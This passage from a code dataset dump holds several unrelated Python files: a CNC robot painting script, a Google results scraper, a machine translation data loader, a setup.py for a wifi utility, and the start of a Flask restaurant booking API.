colors.colorPaint.shape[0] # Amount of colors\r\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\r\nret,label,center=cv2.kmeans(Y,K,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)\r\ncenter = np.uint8(center)\r\nres = center[label.flatten()]\r\nres2 = res.reshape((img.shape))\r\n\r\n#-------------------------------------------------\r\n# Change reduced colors to the colors defined in colors.py\r\n\r\ncolorDifferenceMax = 500\r\na = []\r\nb = []\r\nc = []\r\n\r\nfor i in range(K):\r\n for j in range(K):\r\n #d = math.sqrt((((center[i][2])-(colors.colorPaint[j][2])))**2 + (((center[i][1])-(colors.colorPaint[j][1])))**2 + (((center[i][0])-(colors.colorPaint[j][0])))**2) # Calculate euclidean distance between source colors and palette colors\r\n d = math.sqrt((((center[i][2])-(colors.colorPaint[j][2]))*0.3)**2 + (((center[i][1])-(colors.colorPaint[j][1]))*0.59)**2 + (((center[i][0])-(colors.colorPaint[j][0]))*0.11)**2) # Calculate euclidean distance with weights. May improve color matching. Eyes perceive some colors better then others. 
Uncomment this line and comment out the above one, to apply\r\n a.insert(j, int(d))\r\n if a[np.argmin(a)] < colorDifferenceMax: # Fallback when color distance is too large\r\n b.insert(i, np.argmin(a))\r\n a.clear()\r\n c.clear()\r\n else:\r\n b.insert(i, \"null\")\r\n a.clear()\r\n\r\n# Match colors from k-means reduced input image with color palette from colors.py\r\nfor i in range(K):\r\n res2[np.where((res2== [center[i]]).all(axis=2))] = [colors.colorPaint[b][i]]\r\nimgReduced = deepcopy(res2)\r\n\r\n#-------------------------------------------------\r\n# Setup parameters for CNC translation\r\n\r\n# Calculate pixel-to-mm ratio\r\ncanvasSize = [cfg.canvasWidth, cfg.canvasHeight]\r\nif img.shape[0] > img.shape[1]:\r\n resizeFactor = canvasSize[0]/img.shape[0]\r\nelse:\r\n resizeFactor = canvasSize[0]/img.shape[1]\r\n\r\n# Setup variables\r\nsize = np.size(img)\r\ndone = False\r\nbrushPixel = (cfg.brushSize/resizeFactor)*2\r\ntolerance = 5 # Shrinks the brush size to force overlapping strokes. Increase for less missed spots. Value in mm.\r\ninitialPath = True\r\ncontourExists = False\r\nsinglePathJump = False\r\ndirectionDegrees = 90\r\nkernelBrush = np.ones((int(brushPixel)-int((tolerance/resizeFactor)*2),int(brushPixel)-int((tolerance/resizeFactor)*2)),np.uint8) # Erosion kernel. Reduces brush size. Increase negative values, to reduce missed painting spots\r\nmessageCount = 0\r\n\r\n#-------------------------------------------------\r\n# Communication disabled in demo mode\r\n#\r\n# Network - Socket\r\n\r\n#Binds the Client with the Server\r\n#mySocket = socket.socket()\r\n#mySocket.bind((cfg.host,cfg.port))\r\n \r\n#mySocket.listen(1)\r\n#conn, addr = mySocket.accept()\r\n#print (\"Connection from: \" + str(addr))\r\n\r\n#-------------------------------------------------\r\n# Define communication function\r\n\r\ndef sendActions(message):\r\n global messageCount\r\n #message = message.encode()\r\n #conn.send(message)\r\n print(\"Message sent to client:\", message)\r\n print(\"\\n\")\r\n messageCount += 1\r\n #answer = conn.recv(33)\r\n #answer = answer.decode()\r\n #print(\"Client answer:\", answer)\r\n\r\n#-------------------------------------------------\r\n# Near-Real-Time communication with robot\r\n#\r\n# DOCUMENTATION\r\n#\r\n# <Status 1> = Normal frame of coordinates.\r\n# <Status 2> = Take paint with tool. May be removed, when your tool supports continous paint delivery and needs no paint refresh.\r\n# <Status 3> = Path jump. 
A contour has been finished and the robot jumps to the beginning of the next contour.\r\n\r\n# Loop through all colors K\r\nfor i in range(K):\r\n mask = cv2.inRange(res2, colors.colorPaint[i], colors.colorPaint[i]) # Define parameters of the color mask\r\n ## Remove noise form mask with erosion followed by dilation (Opening)\r\n #kernel = np.ones((2,2),np.uint8) # Fine tune kernel for less or more denoising\r\n #mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\r\n colorSelected = colors.colorPaint[i]\r\n\r\n while(not done):\r\n ret, thresh = cv2.threshold(mask, 127, 255, 0) # Mask color K\r\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) # Find contours in color mask\r\n cv2.drawContours(res2, contours, -1, (0,255,0), 1) # Draw contours\r\n zeros = size - cv2.countNonZero(mask)\r\n mask = cv2.erode(mask,kernelBrush,iterations = 1) # Shrink mask for innermore contour\r\n\r\n # Take paint for the very first time, when currently selected color exists\r\n if len(contours) > 0 and initialPath == True:\r\n sendActions('<Ext><Status>2</Status><Color>99</Color></Ext>')\r\n print(\"Start with color:\", colors.colorPaint[i])\r\n currentStrokeLength = 0\r\n initialPath = False\r\n\r\n # Loop through all contours of the current color\r\n for l in range(len(contours)):\r\n newPath = False\r\n if len(contours[l])>1:\r\n for m in range(len(contours[l])):\r\n contourExists = True\r\n # Calculate distance to next coordinate, if there is a next coordinate in the array\r\n if m < (len(contours[l])-1):\r\n dist = round((np.linalg.norm(contours[l][m][0]-contours[l][m+1][0]))*resizeFactor,1) # Calculate euclidean distance from current to next point\r\n \r\n # Calculate more distant coordinates\r\n if m < (len(contours[l])-5):\r\n longDist = round((np.linalg.norm(contours[l][m][0]-contours[l][m+5][0]))*resizeFactor,1) # Calculate euclidean distance from current to fifth next point\r\n longX = round(contours[l][m+5][0][0]*resizeFactor)\r\n longY = round(contours[l][m+5][0][1]*resizeFactor)\r\n # Fallback, when the coordinate array approached it's end\r\n else: \r\n longX = round(contours[l][m][0][0]*resizeFactor)\r\n longY = round(contours[l][m][0][1]*resizeFactor)\r\n longDist = 0\r\n\r\n # Calculate final coordinates (new and old ones)\r\n # A coordinate is one xy-point in pixel of the contour-array\r\n # It's then multiplied by the resize factor, to convert it into mm\r\n currentX = round((contours[l][m][0][0])*resizeFactor)\r\n currentY = round((contours[l][m][0][1])*resizeFactor)\r\n lastX = round((contours[l][m-1][0][0])*resizeFactor)\r\n lastY = round((contours[l][m-1][0][1])*resizeFactor)\r\n\r\n # Calculate the direction to the next point\r\n directionRadians = math.atan2(currentY-lastY, currentX-lastX)\r\n directionDegrees = (round(math.degrees(directionRadians)/10))*10\r\n # If the distance to the next point is too short and therefore irrelevant, take fifth next point\r\n # This prevents the tool from changing it's direction unnecessarily much, when points have wildly different directions, because they're very close to each other\r\n if longDist < 40:\r\n directionRadians = math.atan2(longY-lastY, longX-lastX)\r\n directionDegrees = (round(math.degrees(directionRadians)/10))*10\r\n\r\n # CLI info\r\n print(\"Angle to next point:\", directionDegrees)\r\n print(\"Distance to next point:\", dist)\r\n print(\"Stroke length:\", currentStrokeLength)\r\n \r\n #-------------------------------------------------\r\n # Sending status and coordinate frames\r\n 
\r\n # Check if coordinates are far enough away from the canvas border\r\n # Not painting these coordinates prevents the robot from painting 'framing contours'\r\n # These are created when the edge contour of an (empty) background is found\r\n # You may change this if you also want these to be painted, e.g. in a full color painting\r\n if currentX <= canvasSize[0]-10 and currentY <= canvasSize[1]-10 and currentX > 10 and currentY > 10: \r\n sendActions('<Ext><Status>1</Status><Points><xyzabc X=\"'+str(currentX)+'\" Y=\"'+str(currentY)+'\" Z=\"'+str(cfg.toolDepth)+'\" A=\"-0\" B=\"-15\" C=\"0\"/></Points></Ext>')\r\n \r\n # When coordinates are too close to the edge (framing coordinates), move the robot to X=350, Y=350, Z=-300\r\n # The robot will stay there and do nothing until the current coordinates are no longer framing coordinates\r\n elif currentX <= canvasSize[0] and currentY <= canvasSize[1]:\r\n print(\"Coordinates too close to the edge. Waiting for inner coordinates.\")\r\n sendActions('<Ext><Status>1</Status><Points><xyzabc X=\"350\" Y=\"350\" Z=\"-300\" A=\"-0\" B=\"-15\" C=\"0\"/></Points></Ext>')\r\n \r\n else:\r\n # Exit with a fatal error when coordinates outside of the canvas are generated\r\n # This prevents the robot from leaving the canvas during the painting process\r\n print(\"currentX, currentY\", currentX, currentY)\r\n sys.exit(\"Fatal: Points are being generated that lie outside the given canvas size. Proceeding may cause serious damage and injury to the manipulator and its surroundings.\")\r\n \r\n # Refresh paint if the robot has painted a path longer than \"strokeLength\"\r\n if currentStrokeLength > cfg.strokeLength:\r\n print(\"Maximum stroke length reached. Refresh paint\")\r\n sendActions('<Ext><Status>2</Status><Color>99</Color></Ext>') \r\n currentStrokeLength = 0 # Reset length of the stroke after color refresh\r\n\r\n currentStrokeLength = currentStrokeLength+dist # Calculate the length of the path painted\r\n singlePathJump = True\r\n\r\n print(\"Contour finished. 
Jump to new contour.\")\r\n if singlePathJump == True:\r\n # Jump to new contour\r\n sendActions('<Ext><Status>3</Status><Points><xyzabc X=\"'+str(lastX)+'\" Y=\"'+str(lastY)+'\" Z=\"'+str(cfg.toolDepth)+'\" A=\"-0\" B=\"-15\" C=\"0\"/></Points></Ext>')\r\n newPath = True\r\n singlePathJump = False\r\n \r\n if zeros == size:\r\n done = True\r\n contourExists = False\r\n done = False\r\n\r\nif done == True:\r\n #conn.close()\r\n print(\"Color finished.\")\r\n\r\n#-------------------------------------------------\r\n# Save and show prepared source image and paths.\r\n\r\npathlib.Path(\"demo_results\").mkdir(exist_ok=True) # Create /demo_results folder, if it doesn't exist\r\nfilename = \"demo_results/\"+str(f\"{datetime.datetime.now():%Y%m%d_%H-%M-%S}\") # Timestamped filename\r\ncv2.imwrite(filename+\"_source.png\", img) # Save image\r\ncv2.imwrite(filename+\"_reduced.png\", imgReduced) # Save image\r\ncv2.imwrite(filename +\"_vectors.png\", res2) # Save image\r\nprint(\"Painting finished.\")\r\nprint(\"Total amount of messages sent:\", messageCount)\r\nprint(\"Results saved as: \"+filename)\r\ncv2.imshow(\"Path Preview\", res2)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","sub_path":"DEMO_imgToCNC.py","file_name":"DEMO_imgToCNC.py","file_ext":"py","file_size_in_byte":12875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"263505116","text":"#!/usr/bin/env python2\n#\n# Perform a google search using python.\nimport urllib\nimport mechanize\nfrom bs4 import BeautifulSoup as BS\nimport re\n\n# function that performs a Google search for the given term and returns the result links.\ndef getGoogleLinks(link):\n # create a browser and change user agent so it thinks we're a person, not a machine.\n br = mechanize.Browser()\n br.set_handle_robots(False)\n br.addheaders = [('User-agent','chrome')]\n\n # replace any spaces in the search term with +.\n term = link.replace(\" \",\"+\")\n # append the search term to the url.\n query = \"https://www.google.com/search?q=\"+term\n htmltext = br.open(query).read()\n soup = BS(htmltext)\n search = soup.findAll('div',attrs={'id':'search'})\n searchtext = str(search[0])\n soup1 = BS(searchtext)\n list_items = soup1.findAll('li')\n regex = \"q(?!.*q).*?&\"\n pattern = re.compile(regex)\n\n results_array = []\n\n for li in list_items:\n soup2 = BS(str(li))\n links = soup2.findAll('a')\n source_link = links[0]\n source_url = re.findall(pattern,str(source_link))\n if len(source_url)>0:\n results_array.append(str(source_url[0].replace(\"q=\",\"\").replace(\"&\",\"\")))\n return results_array\n\n","sub_path":"google/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"104130973","text":"from os.path import join\nimport numpy as np\nimport torch\nimport all_constants as ac\nimport utils as ut\n\nnp.random.seed(ac.SEED)\n\n\nclass DataManager(object):\n def __init__(self, args):\n super(DataManager, self).__init__()\n self.args = args\n self.pairs = args.pairs.split(',')\n self.lang_vocab, self.lang_ivocab = ut.init_vocab(join(args.data_dir, 'lang.vocab'))\n self.vocab, self.ivocab = ut.init_vocab(join(args.data_dir, 'vocab.joint'))\n self.logit_masks = {}\n for lang in self.lang_vocab:\n mask = np.load(join(args.data_dir, 'mask.{}.npy'.format(lang)))\n self.logit_masks[lang] = torch.from_numpy(mask)\n\n def load_data(self):\n self.data = {}\n data_dir = self.args.data_dir\n batch_size = self.args.batch_size\n for pair in self.pairs:\n 
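# data[pair][mode] holds a PEDataset of padded (src, guess, tgt) batches for this language pair and split\n 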
self.data[pair] = {}\n src_lang, tgt_lang = pair.split('2')\n for mode in [ac.TRAIN, ac.DEV]:\n src_file = join(data_dir, '{}/{}.{}.npy'.format(pair, mode, src_lang))\n guess_file = join(data_dir, '{}/{}.guess.{}.npy'.format(pair, mode, tgt_lang))\n tgt_file = join(data_dir, '{}/{}.target.{}.npy'.format(pair, mode, tgt_lang))\n src = np.load(src_file)\n guess = np.load(guess_file)\n tgt = np.load(tgt_file)\n self.args.logger.info('Loading {}-{}'.format(pair, mode))\n self.data[pair][mode] = PEDataset(src, guess, tgt, batch_size)\n\n # batch sampling similar to in preprocessing.py\n ns = np.array([len(self.data[pair][ac.TRAIN]) for pair in self.pairs])\n ps = ns / sum(ns)\n ps = ps ** self.args.alpha\n ps = ps / sum(ps)\n self.ps = ps\n self.args.logger.info('Sampling batches with probs:')\n for idx, pair in enumerate(self.pairs):\n self.args.logger.info('{}, n={}, p={}'.format(pair, ns[idx], ps[idx]))\n\n self.train_iters = {}\n for pair in self.pairs:\n self.train_iters[pair] = self.data[pair][ac.TRAIN].get_iter(shuffle=True)\n\n # load dev translate batches\n self.translate_data = {}\n for pair in self.pairs:\n src_lang, tgt_lang = pair.split('2')\n src_file = join(data_dir, '{}/{}.{}.bpe'.format(pair, ac.DEV, src_lang))\n guess_file = join(data_dir, '{}/{}.guess.{}.bpe'.format(pair, ac.DEV, tgt_lang))\n ref_file = join(data_dir, '{}/{}.target.{}'.format(pair, ac.DEV, tgt_lang))\n self.args.logger.info('Loading dev translate batches')\n src_batches, guess_batches, sorted_idxs = self.get_translate_batches(src_file, guess_file, batch_size=batch_size)\n self.translate_data[pair] = {\n 'src_batches': src_batches,\n 'guess_batches': guess_batches,\n 'sorted_idxs': sorted_idxs,\n 'ref_file': ref_file\n }\n\n def get_batch(self):\n pair = np.random.choice(self.pairs, p=self.ps)\n try:\n src, guess, tgt, targets = next(self.train_iters[pair])\n except StopIteration:\n self.train_iters[pair] = self.data[pair][ac.TRAIN].get_iter(shuffle=True)\n src, guess, tgt, targets = next(self.train_iters[pair])\n\n src_lang, tgt_lang = pair.split('2')\n return {\n 'src': src,\n 'guess': guess,\n 'tgt': tgt,\n 'targets': targets,\n 'src_lang_idx': self.lang_vocab[src_lang],\n 'guess_lang_idx': self.lang_vocab[tgt_lang],\n 'tgt_lang_idx': self.lang_vocab[tgt_lang],\n 'pair': pair,\n 'logit_mask': self.logit_masks[tgt_lang]\n }\n\n def get_translate_batches(self, src_file, guess_file, batch_size=4096):\n sdata = []\n slens = []\n gdata = []\n glens = []\n with open(src_file, 'r') as fin:\n for line in fin:\n toks = line.strip().split()\n if toks:\n ids = [self.vocab.get(tok, ac.UNK_ID) for tok in toks] + [ac.EOS_ID]\n sdata.append(ids)\n slens.append(len(ids))\n\n with open(guess_file, 'r') as fin:\n for line in fin:\n gtoks = line.strip().split()\n if gtoks:\n ids = [self.vocab.get(tok, ac.UNK_ID) for tok in gtoks] + [ac.EOS_ID]\n gdata.append(ids)\n glens.append(len(ids))\n\n\n slens = np.array(slens)\n sdata = np.array(sdata)\n glens = np.array(glens)\n gdata = np.array(gdata)\n sorted_idxs = np.argsort(slens)\n slens = slens[sorted_idxs]\n sdata = sdata[sorted_idxs]\n glens = glens[sorted_idxs]\n gdata = gdata[sorted_idxs]\n\n # create batches\n src_batches = []\n guess_batches = []\n s_idx = 0\n length = sdata.shape[0]\n while s_idx < length:\n e_idx = s_idx + 1\n max_in_batch = slens[s_idx]\n gmax_in_batch = glens[s_idx]\n while e_idx < length:\n max_in_batch = max(max_in_batch, slens[e_idx])\n gmax_in_batch = max(gmax_in_batch, glens[e_idx])\n count = (e_idx - s_idx + 1) * 2 * max(max_in_batch, 
gmax_in_batch)\n if count > batch_size:\n break\n else:\n e_idx += 1\n\n max_in_batch = max(slens[s_idx:e_idx])\n gmax_in_batch = max(glens[s_idx:e_idx])\n src = np.zeros((e_idx - s_idx, max_in_batch), dtype=np.int32)\n guess = np.zeros((e_idx - s_idx, gmax_in_batch), dtype=np.int32)\n for i in range(s_idx, e_idx):\n src[i - s_idx] = list(sdata[i]) + (max_in_batch - slens[i]) * [ac.PAD_ID]\n guess[i - s_idx] = list(gdata[i]) + (gmax_in_batch - glens[i]) * [ac.PAD_ID]\n src_batches.append(torch.from_numpy(src).type(torch.long))\n guess_batches.append(torch.from_numpy(guess).type(torch.long))\n s_idx = e_idx\n\n return src_batches, guess_batches, sorted_idxs\n\n\nclass NMTDataset(object):\n def __init__(self, src, tgt, batch_size):\n super(NMTDataset, self).__init__()\n if src.shape[0] != tgt.shape[0]:\n raise ValueError('src and tgt must have the same size')\n\n self.batch_size = batch_size\n self.batches = []\n\n sorted_idxs = np.argsort([len(x) for x in src])\n src = src[sorted_idxs]\n tgt = tgt[sorted_idxs]\n src_lens = [len(x) for x in src]\n tgt_lens = [len(x) for x in tgt]\n\n # prepare batches\n s_idx = 0\n while s_idx < src.shape[0]:\n e_idx = s_idx + 1\n max_src_in_batch = src_lens[s_idx]\n max_tgt_in_batch = tgt_lens[s_idx]\n while e_idx < src.shape[0]:\n max_src_in_batch = max(max_src_in_batch, src_lens[e_idx])\n max_tgt_in_batch = max(max_tgt_in_batch, tgt_lens[e_idx])\n num_toks = (e_idx - s_idx + 1) * max(max_src_in_batch, max_tgt_in_batch)\n if num_toks > self.batch_size:\n break\n else:\n e_idx += 1\n\n batch = self.prepare_one_batch(\n src[s_idx:e_idx],\n tgt[s_idx:e_idx],\n src_lens[s_idx:e_idx],\n tgt_lens[s_idx:e_idx])\n self.batches.append(batch)\n s_idx = e_idx\n\n self.indices = list(range(len(self.batches)))\n\n def __len__(self):\n return len(self.batches)\n\n def prepare_one_batch(self, src, tgt, src_lens, tgt_lens):\n num_sents = len(src)\n max_src_len = max(src_lens)\n max_tgt_len = max(tgt_lens)\n\n src_batch = np.zeros([num_sents, max_src_len], dtype=np.int32)\n tgt_batch = np.zeros([num_sents, max_tgt_len], dtype=np.int32)\n target_batch = np.zeros([num_sents, max_tgt_len], dtype=np.int32)\n\n for i in range(num_sents):\n src_batch[i] = src[i] + (max_src_len - src_lens[i]) * [ac.PAD_ID]\n tgt_batch[i] = tgt[i] + (max_tgt_len - tgt_lens[i]) * [ac.PAD_ID]\n target_batch[i] = tgt[i][1:] + [ac.EOS_ID] + (max_tgt_len - tgt_lens[i]) * [ac.PAD_ID]\n\n src_batch = torch.from_numpy(src_batch).type(torch.long)\n tgt_batch = torch.from_numpy(tgt_batch).type(torch.long)\n target_batch = torch.from_numpy(target_batch).type(torch.long)\n return src_batch, tgt_batch, target_batch\n\n def get_iter(self, shuffle=False):\n if shuffle:\n np.random.shuffle(self.indices)\n\n for idx in self.indices:\n yield self.batches[idx]\n\n\nclass PEDataset(object):\n def __init__(self, src, guess, tgt, batch_size):\n super(PEDataset, self).__init__()\n if src.shape[0] != tgt.shape[0]:\n raise ValueError('src and tgt must have the same size')\n if src.shape[0] != guess.shape[0]:\n raise ValueError('src and guess must have the same size')\n if tgt.shape[0] != guess.shape[0]:\n raise ValueError('tgt and guess must have the same size')\n\n self.batch_size = batch_size\n self.batches = []\n\n sorted_idxs = np.argsort([len(x) for x in src])\n src = src[sorted_idxs]\n tgt = tgt[sorted_idxs]\n guess = guess[sorted_idxs]\n src_lens = [len(x) for x in src]\n tgt_lens = [len(x) for x in tgt]\n guess_lens = [len(x) for x in guess]\n\n # prepare batches\n s_idx = 0\n while s_idx < src.shape[0]:\n e_idx = 
s_idx + 1\n max_src_in_batch = src_lens[s_idx]\n max_guess_in_batch = guess_lens[s_idx]\n max_tgt_in_batch = tgt_lens[s_idx]\n while e_idx < src.shape[0]:\n max_src_in_batch = max(max_src_in_batch, src_lens[e_idx])\n max_guess_in_batch = max(max_guess_in_batch, guess_lens[e_idx])\n max_tgt_in_batch = max(max_tgt_in_batch, tgt_lens[e_idx])\n num_toks = (e_idx - s_idx + 1) * max(max_src_in_batch, max_tgt_in_batch, max_guess_in_batch)\n if num_toks > self.batch_size:\n break\n else:\n e_idx += 1\n\n batch = self.prepare_one_batch(\n src[s_idx:e_idx],\n guess[s_idx:e_idx],\n tgt[s_idx:e_idx],\n src_lens[s_idx:e_idx],\n guess_lens[s_idx:e_idx],\n tgt_lens[s_idx:e_idx])\n self.batches.append(batch)\n s_idx = e_idx\n\n self.indices = list(range(len(self.batches)))\n\n def __len__(self):\n return len(self.batches)\n\n def prepare_one_batch(self, src, guess, tgt, src_lens, guess_lens, tgt_lens):\n num_sents = len(src)\n max_src_len = max(src_lens)\n max_guess_len = max(guess_lens)\n max_tgt_len = max(tgt_lens)\n\n src_batch = np.zeros([num_sents, max_src_len], dtype=np.int32)\n guess_batch = np.zeros([num_sents, max_guess_len], dtype=np.int32)\n tgt_batch = np.zeros([num_sents, max_tgt_len], dtype=np.int32)\n target_batch = np.zeros([num_sents, max_tgt_len], dtype=np.int32)\n\n for i in range(num_sents):\n src_batch[i] = src[i] + (max_src_len - src_lens[i]) * [ac.PAD_ID]\n guess_batch[i] = guess[i] + (max_guess_len - guess_lens[i]) * [ac.PAD_ID]\n tgt_batch[i] = tgt[i] + (max_tgt_len - tgt_lens[i]) * [ac.PAD_ID]\n target_batch[i] = tgt[i][1:] + [ac.EOS_ID] + (max_tgt_len - tgt_lens[i]) * [ac.PAD_ID]\n\n src_batch = torch.from_numpy(src_batch).type(torch.long)\n guess_batch = torch.from_numpy(guess_batch).type(torch.long)\n tgt_batch = torch.from_numpy(tgt_batch).type(torch.long)\n target_batch = torch.from_numpy(target_batch).type(torch.long)\n return src_batch, guess_batch, tgt_batch, target_batch\n\n def get_iter(self, shuffle=False):\n if shuffle:\n np.random.shuffle(self.indices)\n\n for idx in self.indices:\n yield self.batches[idx]","sub_path":"data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":12117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"138109264","text":"#!/usr/bin/env python\nfrom setuptools import setup, Command\nimport os\n\n__doc__ = \"\"\"\nCommand line tool and library wrappers around iwlist and\n/etc/network/interfaces.\n\"\"\"\n\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\ninstall_requires = [\n 'setuptools',\n 'pbkdf2',\n 'netaddr'\n]\ntry:\n import argparse\nexcept:\n install_requires.append('argparse')\n\nversion = '1.0.1'\n\nEXTRAS = [\n ('/etc/bash_completion.d/', [('extras/wifi-completion.bash', 'wifi-completion', 0o644)])\n]\n\n\ndef get_extra_tuple(entry):\n if isinstance(entry, (tuple, list)):\n if len(entry) == 2:\n path, mode = entry\n filename = os.path.basename(path)\n elif len(entry) == 3:\n path, filename, mode = entry\n elif len(entry) == 1:\n path = entry[0]\n filename = os.path.basename(path)\n mode = None\n else:\n return None\n\n else:\n path = entry\n filename = os.path.basename(path)\n mode = None\n\n return path, filename, mode\n\n\nclass InstallExtrasCommand(Command):\n description = \"install extras like init scripts and config files\"\n user_options = [(\"force\", \"F\", \"force overwriting files if they already exist\")]\n\n def initialize_options(self):\n self.force = None\n\n def finalize_options(self):\n if 
self.force is None:\n self.force = False\n\n def run(self):\n global EXTRAS\n import shutil\n import os\n\n for target, files in EXTRAS:\n for entry in files:\n extra_tuple = get_extra_tuple(entry)\n if extra_tuple is None:\n print(\"Can't parse entry for target %s, skipping it: %r\" % (target, entry))\n continue\n\n path, filename, mode = extra_tuple\n target_path = os.path.join(target, filename)\n\n path_exists = os.path.exists(target_path)\n if path_exists and not self.force:\n print(\"Skipping copying %s to %s as it already exists, use --force to overwrite\" % (path, target_path))\n continue\n\n try:\n shutil.copy(path, target_path)\n if mode:\n os.chmod(target_path, mode)\n print(\"Copied %s to %s and changed mode to %o\" % (path, target_path, mode))\n else:\n print(\"Copied %s to %s\" % (path, target_path))\n except Exception as e:\n if not path_exists and os.path.exists(target_path):\n # we'll try to clean up again\n try:\n os.remove(target_path)\n except:\n pass\n\n import sys\n print(\"Error while copying %s to %s (%s), aborting\" % (path, target_path, e))\n sys.exit(-1)\n\n\nclass UninstallExtrasCommand(Command):\n description = \"uninstall extras like init scripts and config files\"\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n global EXTRAS\n import os\n\n for target, files in EXTRAS:\n for entry in files:\n extra_tuple = get_extra_tuple(entry)\n if extra_tuple is None:\n print(\"Can't parse entry for target %s, skipping it: %r\" % (target, entry))\n continue\n\n path, filename, mode = extra_tuple\n target_path = os.path.join(target, filename)\n try:\n os.remove(target_path)\n print(\"Removed %s\" % target_path)\n except Exception as e:\n print(\"Error while deleting %s from %s (%s), please remove manually\" % (filename, target, e))\n\n\nsetup(\n name='wifi',\n version=version,\n author='Rocky Meza, Gavin Wahl',\n author_email='rockymeza@gmail.com',\n description=__doc__,\n long_description='\\n\\n'.join([read('README.rst'), read('CHANGES.rst')]),\n packages=['wifi'],\n scripts=['bin/wifi'],\n test_suite='tests',\n platforms=[\"Debian\"],\n license='BSD',\n install_requires=install_requires,\n classifiers=[\n \"License :: OSI Approved :: BSD License\",\n \"Topic :: System :: Networking\",\n \"Operating System :: POSIX :: Linux\",\n \"Environment :: Console\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.3\",\n ],\n cmdclass={\n 'install_extras': InstallExtrasCommand,\n 'uninstall_extras': UninstallExtrasCommand\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567708288","text":"# -*- coding: utf-8 -*-\nfrom flask import Response\nfrom flask import request\nfrom flask_restful import Resource\nfrom dateutil.parser import parse\nfrom langconv import Converter\nfrom datetime import datetime\nfrom datetime import timedelta\nimport json\nimport re\nimport requests\nimport constants\nimport logging\nLOG = logging.getLogger(__name__)\n\n\ndef setup_route(api):\n \"\"\"\n Register each endpoint and its handler on the API.\n \"\"\"\n api.add_resource(ConvertParams, '/restaurant/convert_params')\n api.add_resource(ConvertParamsNLU1, '/restaurant/convert_params_nlu1')\n api.add_resource(ConvertParamsNLU2, '/restaurant/convert_params_nlu2')\n \n 
api.add_resource(SearchRestaurant, '/restaurant/search')\n api.add_resource(BookRestaurant, '/restaurant/book')\n api.add_resource(ListMoreOptions, '/restaurant/more_opts')\n api.add_resource(ListRequerements, '/restaurant/requirements')\n api.add_resource(UpdateRequerements, '/restaurant/opd_requirements')\n api.add_resource(ResetParams, '/restaurant/reset_params')\n\n api.add_resource(SearchReserveOrderByPhone, '/reserve_order/search_by_phone')\n api.add_resource(SearchReserveOrderBySeriesNumber, '/reserve_order/search_by_series_number')\n api.add_resource(CancelReserveOrder, '/reserve_order/cancel')\n api.add_resource(EditReserveOrder, '/reserve_order/edit')\n\n # inline booking\n api.add_resource(InlineStartBooking, '/VBooking/rest/inline/startBooking')\n api.add_resource(InlineDoBooking, '/VBooking/rest/inline/doBooking')\n api.add_resource(InlineEndBooking, '/VBooking/rest/inline/endBooking')\n\ndef encapsule_rtn_format(update_kv_map, remove_kv_map):\n rtn_obj = {\n \"status_code\": 0,\n \"msg_response\": {}\n }\n if update_kv_map is not None:\n rtn_obj['msg_response']['update'] = update_kv_map\n if remove_kv_map is not None:\n rtn_obj['msg_response']['remove'] = remove_kv_map\n return rtn_obj\n\ndef get_num(num_str):\n # Convert a number written in Chinese characters into a numeric string.\n payload = {\n \"id\": \"integer-number\",\n \"hasContext\": False,\n \"query\": Converter('zh-hans').convert(num_str)\n }\n payload = json.dumps(payload, ensure_ascii=False)\n payload = payload.encode('utf-8')\n headers = {'content-type': 'application/json'}\n r = requests.post(constants.TDE_URL, payload, timeout=float(constants.REQUEST_TIMEOUT), headers=headers)\n r_obj = r.json()\n # LOG.info(json.dumps(r_obj, ensure_ascii=False, indent=4))\n try:\n num = r_obj['informs'][0]['value']['displayText']\n except:\n num = None\n LOG.error('failed to parse a number from num_str')\n return num\n\ndef get_phone_num(num_str):\n # Convert a phone number written in Chinese characters into a numeric string.\n payload = {\n \"id\": \"phone\",\n \"hasContext\": False,\n \"arguments\":{\n \"regions\" : [\"mainland\",\"tw\"],\n \"types\":[\"mobile\",\"landline\"]\n },\n \"query\": Converter('zh-hans').convert(num_str)\n }\n payload = json.dumps(payload, ensure_ascii=False)\n payload = payload.encode('utf-8')\n headers = {'content-type': 'application/json'}\n r = requests.post(constants.TDE_URL, payload, timeout=float(constants.REQUEST_TIMEOUT), headers=headers)\n r_obj = r.json()\n # LOG.info(json.dumps(r_obj, ensure_ascii=False, indent=4))\n try:\n phone = r_obj['informs'][0]['value']['displayText']\n except:\n phone = None\n LOG.error('failed to parse a phone number from num_str')\n return phone\n\ndef get_hourtime(hour_str):\n # Get the actual time of day, e.g. hh:mm:ss\n payload = {\n \"id\": \"chrono\",\n \"hasContext\": True,\n \"arguments\": {\n \"orientation\": \"future\",\n \"timePoint\": {\n \"onlyOne\": \"last\",\n \"distinguishType\": False\n },\n \"duration\": {\n \"extract\": False,\n \"onlyOne\": \"last\"\n }\n },\n \"query\": Converter('zh-hans').convert(hour_str),\n }\n payload = json.dumps(payload, ensure_ascii=False)\n payload = payload.encode('utf-8')\n headers = {'content-type': 'application/json'}\n r = requests.post(constants.TDE_URL, payload, timeout=float(constants.REQUEST_TIMEOUT), headers=headers)\n # error_msg = 'API invocation fail,url:%s, status_code:%s, response:%s'\\\n # % (constants.TDE_URL, r.status_code, r.text)\n # LOG.error(error_msg)\n r_obj = r.json()\n\n \n # LOG.info(json.dumps(r_obj, ensure_ascii=False, indent=4))\n 
